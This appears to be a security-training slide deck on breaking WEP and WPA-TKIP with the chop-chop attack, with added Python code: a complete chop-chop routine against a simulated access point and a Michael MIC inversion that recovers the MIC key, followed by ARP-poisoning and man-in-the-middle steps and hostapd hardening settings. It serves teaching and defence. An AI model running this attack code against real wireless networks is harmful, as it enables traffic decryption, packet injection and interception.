Breaking WPA2 with chop-chop attack
Marcell FÓTI
CEH, ECSA, MCSE, MCDBA, Security MVP, MCT
Inescapable history: WEP :
RC4 encryption
What does a WEP packet look like? In the clear: the 24-bit IV and the key ID. RC4-encrypted under IV || key: Data, followed by the CRC-32 of the data (the ICV)
Weaknesses in WEP :
Yes, the "random" IV is predictable (only 24 bits, often a plain counter, so it repeats and keystream gets reused),
Yes, RC4 as used here is not strong enough (weak-key attacks on the IV || key construction),
Yes, there is no rekeying, but the worst is...
The encrypted packet can be decrypted byte by byte, without knowing the key!
Traditional chop-chop :
There is an easy formula to correct the encrypted(!) CRC-32 (the ICV) of a truncated, still encrypted(!) WEP packet: CRC-32 is linear, so chopping the last byte changes the ICV in a way that depends only on the plaintext of the chopped byte, not on the key or on the rest of the data
Supposing we know what was lost, the repair is exact
If we don't know what is missing, we can guess it: 256 possibilities at most
The WEP-quiz :
1. Sniff an encrypted packet
2. Chop one byte from the end. Its plaintext is the secret to reveal
3. Correct the damaged packet by using the formula, supposing the secret byte was 1
4. Send the (supposedly) "repaired" packet to the AP
5. If the AP broadcasts it, the ICV matched and we were right; ciphertext XOR plaintext also gives us one keystream byte
6. If not, repair the checksum with 2, then 3, 4... until the AP accepts (at most 256 tries per byte)
7. Go to step 2, get the next secret byte (the ICV bytes come out first, then the data)
The result of chop-chop :
After the attack we'll have
The encrypted packet (E)
The packet in clear (C)
E XOR C = the RC4 keystream for that IV (not the WEP key itself, but enough to decrypt or forge any packet up to that length under the same IV)
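The quiz above and the E XOR C result, carried out end to end against a simulated access point. This is an added example written for this page, not the author's lab material: the WEP key, IV and payload are constructed, the "AP" is a Python function that only reports whether a frame's ICV checks out, and the attacker code never reads the key.

```python
"""Chop-chop against a simulated WEP AP (added example, not the deck's lab code).
WEP key, IV and payload are constructed; the attacker only sees accept/reject."""
import struct
import zlib

# Reflected CRC-32 table (polynomial 0xEDB88320), the CRC WEP uses for its ICV.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)

# The top byte of every table entry is distinct, so it identifies the entry.
# That is the "easy formula": one CRC step can be undone from its top byte alone.
TOP_BYTE_TO_INDEX = {t >> 24: i for i, t in enumerate(CRC_TABLE)}
assert len(TOP_BYTE_TO_INDEX) == 256


def rc4_keystream(key, length):
    """Plain RC4: key schedule over `key`, then `length` output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, data):
    """WEP body: IV in clear, then RC4(IV || key) over data || CRC-32(data)."""
    plain = data + struct.pack("<I", zlib.crc32(data))   # ICV is little-endian
    return iv + xor(plain, rc4_keystream(iv + wep_key, len(plain)))


def ap_accepts(wep_key, frame):
    """The simulated AP: decrypts and relays the frame only if the ICV is correct."""
    iv, body = frame[:3], frame[3:]
    if len(body) < 4:
        return False
    plain = xor(body, rc4_keystream(iv + wep_key, len(body)))
    return struct.unpack("<I", plain[-4:])[0] == zlib.crc32(plain[:-4])


def chop_correct(body, guess):
    """Drop the last ciphertext byte and repair the still-encrypted ICV, assuming
    `guess` is the plaintext of the dropped byte.
    That byte is the top byte of the CRC register before its final inversion
    (guess ^ 0xFF), which selects the table entry t the last CRC step XORed in.
    Undoing the step shifts the register down one byte and XORs t back; unknown
    plaintext and keystream bytes cancel, so this works directly on ciphertext."""
    i = TOP_BYTE_TO_INDEX[guess ^ 0xFF]
    t = CRC_TABLE[i]
    fixed = bytearray(body[:-1])
    fixed[-4] ^= i ^ 0xFF          # new lowest ICV byte, over the old last data byte
    fixed[-3] ^= t & 0xFF          # the other three ICV bytes, each moved down one
    fixed[-2] ^= (t >> 8) & 0xFF
    fixed[-1] ^= (t >> 16) & 0xFF
    return bytes(fixed)


def chopchop(iv, body, oracle):
    """Recover plaintext and keystream of `body` from the end, one byte per round,
    using only accept/reject. Returns (plaintext, keystream, frames_sent)."""
    pkt = bytes(body)
    keystream_rev = bytearray()          # keystream bytes, last position first
    sent = 0
    while len(pkt) > 4:                  # stop when only an ICV is left
        for guess in range(256):
            candidate = chop_correct(pkt, guess)
            sent += 1
            if oracle(iv + candidate):   # the AP relayed it: the guess was right
                keystream_rev.append(pkt[-1] ^ guess)
                pkt = candidate
                break
        else:
            raise RuntimeError("no guess accepted: not a WEP-style ICV oracle")
    # Four bytes left: the ICV of the empty message is CRC-32("") == 0, so what
    # remains is pure keystream.
    keystream = pkt + bytes(reversed(keystream_rev))
    return xor(body, keystream), keystream, sent


# Constructed values, not captured traffic.
WEP_KEY = bytes.fromhex("0123456789abcdef0123456789")   # 104-bit key
IV = bytes.fromhex("a1b2c3")
PAYLOAD = b"constructed ARP-like body"


def demo():
    frame = wep_encrypt(WEP_KEY, IV, PAYLOAD)
    # The attacker's only view of WEP_KEY is the AP's accept/reject behaviour.
    return chopchop(frame[:3], frame[3:], lambda f: ap_accepts(WEP_KEY, f))


if __name__ == "__main__":
    plain, keystream, sent = demo()
    print("recovered data :", plain[:-4])
    print("keystream      :", keystream.hex())
    print("frames injected:", sent)
```

Each byte costs at most 256 injected frames, and exactly one guess per round is accepted, because a wrong guess leaves a non-zero difference in the decrypted ICV. What comes out is the keystream for that IV, which is why IV reuse is fatal for WEP.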
The strengths of WPA (TKIP) :
Longer, sequential IV (the 48-bit TKIP sequence counter) with per-packet key mixing, so keystream is not reused
Additional crypto-checksum
Michael, the Message Integrity Check (MIC): keyed, and placed before the CRC-32 ICV
Lock out for 1 minute after 2 MIC failures in 60 secs (the TKIP countermeasures), then rekey
Counter at the receiver (the sequence counter) to get rid of replayed packets
Rekeying every hour (3600 secs) by default
But what about compatibility?
It is compatible with WEP hardware: still RC4, still a CRC-32 ICV!
The inherent weakness of WPA (TKIP) :
It is still encrypted with RC4, over data || MIC || CRC-32 ICV
Poor Michael is second in line: the receiver checks the CRC-32 ICV first and silently drops a bad one, and only a frame with a correct ICV reaches the MIC check, so
We can guess byte by byte using chop-chop at full speed, if
We can avoid the anti-replay counter
There are 8 subchannels in WPA: the QoS (802.11e / WMM) traffic classes, each with its own replay counter
Clients almost always use channel 0
We have 7 more subchannels with counter values way below ours, so a captured frame replayed there is not "old"
The "good result" is a MIC failure report: ICV correct (our guess was right), MIC wrong, and the client reports it
A wrong guess is dropped silently at the ICV and costs us nothing
We can guess 1 byte per minute: a second MIC failure within 60 secs would shut the link down
Then we get 1 minute to relax before the next byte
What we can do with WPA? :
Michael is invertible: given a MIC and the plaintext it covers, reverse-Michael computes the MIC key
Input parameters we need
The actual MIC value in clear text (8 bytes, about 8 mins of chop-chop)
And a packet in clear text...
Have a look at an ARP packet
42 encrypted bytes
But the format is fixed, so only 2 bytes are unknown (the last byte of each IP address): 2 mins of chop-chop
We recover the MIC key for the AP → client direction (the AP's key), not the client's
So, towards that client, we are an AP now!
We can start injecting ARP poisoning packets: each recovered keystream can be reused once on every one of the 7 other QoS channels
MITM begins...
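Michael and its inverse, as an added example (not the author's code) for the reverse-Michael step above. It implements the Michael MIC as specified for TKIP (key as two 32-bit words, block function b, 0x5a padding) and recovers the key from one MIC plus the plaintext it covers. The real TKIP MIC runs over DA || SA || priority || three zero bytes || MSDU data; MESSAGE below is a constructed stand-in for that byte string and MIC_KEY is a constructed key.

```python
"""Michael MIC and the reverse-Michael key recovery (added example, not the deck's code).
MIC_KEY and MESSAGE are constructed; MESSAGE mimics the TKIP MIC input layout."""
import struct

MASK = 0xFFFFFFFF


def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def xswap(x):
    """Swap the two bytes inside each 16-bit half of x."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def block(l, r):
    """Michael block function b(L, R)."""
    r ^= rotl(l, 17); l = (l + r) & MASK
    r ^= xswap(l);    l = (l + r) & MASK
    r ^= rotl(l, 3);  l = (l + r) & MASK
    r ^= rotr(l, 2);  l = (l + r) & MASK
    return l, r


def block_inverse(l, r):
    """Every step of block() is an addition or an XOR with a function of l, so
    it runs backwards exactly; this is what makes key recovery possible."""
    l = (l - r) & MASK; r ^= rotr(l, 2)
    l = (l - r) & MASK; r ^= rotl(l, 3)
    l = (l - r) & MASK; r ^= xswap(l)
    l = (l - r) & MASK; r ^= rotl(l, 17)
    return l, r


def pad(msg):
    """Michael padding: one 0x5a byte, then 4 to 7 zero bytes up to a multiple of 4."""
    zeros = 4 + (-(len(msg) + 5) % 4)
    return msg + b"\x5a" + b"\x00" * zeros


def words(data):
    return struct.unpack("<%dI" % (len(data) // 4), data)


def michael(key, msg):
    """MIC = Michael(key, msg): 8-byte key in, 8-byte MIC out (little-endian words)."""
    l, r = struct.unpack("<II", key)
    for m in words(pad(msg)):
        l ^= m
        l, r = block(l, r)
    return struct.pack("<II", l, r)


def reverse_michael(mic, msg):
    """Recover the MIC key from one MIC and the plaintext it covers, i.e. from
    exactly the two inputs the deck lists (both obtained byte by byte with chop-chop)."""
    l, r = struct.unpack("<II", mic)
    for m in reversed(words(pad(msg))):
        l, r = block_inverse(l, r)
        l ^= m
    return struct.pack("<II", l, r)


# Constructed values, not a captured frame.
MIC_KEY = bytes.fromhex("d55e100510128986")           # 64-bit TKIP MIC key
DA = bytes.fromhex("001122334455")                    # destination MAC
SA = bytes.fromhex("66778899aabb")                    # source MAC
MESSAGE = DA + SA + b"\x00\x00\x00\x00" + b"constructed ARP body"   # priority + 3 zeros + data


def demo():
    mic = michael(MIC_KEY, MESSAGE)
    return mic, reverse_michael(mic, MESSAGE)


if __name__ == "__main__":
    mic, recovered = demo()
    print("MIC          :", mic.hex())
    print("recovered key:", recovered.hex(), "(matches)" if recovered == MIC_KEY else "(mismatch)")
```

Michael was designed to be fast on WEP-era hardware, not to be a one-way function; the inverse runs in the same number of steps as the forward direction, which is why one recovered MIC and one known plaintext are enough.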
How to prevent this? :
Set the rekeying interval to 120 secs instead of 3600 secs, so a MIC key that took some 12 minutes of chop-chop to recover is already useless
Disable TKIP, use AES-CCMP instead (WPA2 with CCMP; the attack is against TKIP, under whichever label it is negotiated)
...which means getting rid of lots of ancient hardware
Disable the MIC failure report on the clients (it is the attacker's oracle, but it is also what triggers the countermeasures)
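A hostapd.conf fragment with the two AP-side settings the slide asks for, weak value beside the fix. This is an added example, not from the deck; only hostapd's real parameter names are used, while the interface, SSID and passphrase are placeholders. There is no AP-side knob for the client's MIC failure report, so that item is not shown.

```ini
# hostapd.conf fragment (added example). Placeholders: interface, ssid, passphrase.
interface=wlan0
ssid=example-ssid
wpa=2
# RSN (WPA2) only: wpa=1 or wpa=3 would also offer the WPA1 information element.
wpa_key_mgmt=WPA-PSK
wpa_passphrase=CHANGE-ME-placeholder

# Weak: TKIP keeps RC4 plus Michael, the pair chop-chop exploits.
#rsn_pairwise=TKIP
# Fix: CCMP (AES) only. A TKIP-only card will simply fail to associate.
rsn_pairwise=CCMP

# If TKIP must stay for legacy clients, at least shrink the rekey window from
# the hour the slide mentions to 120 seconds (both group and pairwise keys).
wpa_group_rekey=120
wpa_ptk_rekey=120
```

With `rsn_pairwise=CCMP` the rekey lines are belt and braces; with TKIP still enabled they are the only thing limiting how long a recovered MIC key stays valid.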
Let's do it! :
End of theory. And now... LAB: Chop-chop attack (30 minutes)